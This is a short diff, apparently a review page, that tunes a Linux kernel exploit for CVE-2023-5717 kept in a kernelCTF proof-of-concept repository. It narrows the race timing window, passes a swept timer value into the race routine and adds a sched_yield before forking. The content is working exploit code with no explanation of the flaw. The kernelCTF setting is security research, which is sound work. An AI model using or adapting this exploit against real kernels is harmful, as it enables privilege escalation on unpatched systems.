Finding r

Author: msh1307

pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit

@@ -29,8 +29,8 @@
 #include <signal.h>
 
 // #define TIMER 71000
-#define MIN 58000
-#define MAX 79000
+#define MIN 58200
+#define MAX 62400
 #define SIBLINGS_MAX 1024 // about 0x4000 ~
 #define CPU_A 1 // main cpu
 #define CPU_B 0
@@ -286,7 +286,7 @@ void print_proc_self_maps_raw() {
 }
 
 int counter_init = 0;
-void race(int group_leader) { // caller must have ownership of the group
+void race(int group_leader, int timer) { // caller must have ownership of the group
     int pipefd[2];
     uint64_t buf[0x2000] = {0, };
     char buffer[0x100] = {0x41, };
@@ -364,10 +364,12 @@ void race(int group_leader) { // caller must have ownership of the group
         kill(child_pid, SIGCONT); // continue
 
         read(pipefd[0], buffer, 1); // sync point A
-        // usleep(5000);
-		int r = MIN + rand() % (MAX - MIN + 1);
+        // busy_wait(1000);
+		// int r = MIN + rand() % (MAX - MIN + 1);
+        int r = timer;
         struct itimerspec new = {.it_value.tv_nsec = r}; // 95674
         timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
+        
         if (close(siblings[100]) < 0) { // trigger
             perror("close failed");
             exit(EXIT_FAILURE);
@@ -415,6 +417,8 @@ pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){
     pe.exclude_hv = 1;
     pe.inherit = 1; // parent.attr.inherit == child.attr.inherit
     pe.pinned = 0; // child can not be pinned - group leader only
+    
+    sched_yield();
     pid_t child_pid = fork();
     if(child_pid == 0) { 
         // child & parent must be on the same cpu (validation event->cpu) 
@@ -484,7 +488,7 @@ pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){
 
             for (int _; _<TRY_PER_ITER; _++) {
                 while (!atomic_load(&race_go));
-                race(group_leader);
+                race(group_leader, MIN + _*50);
 
             }
         }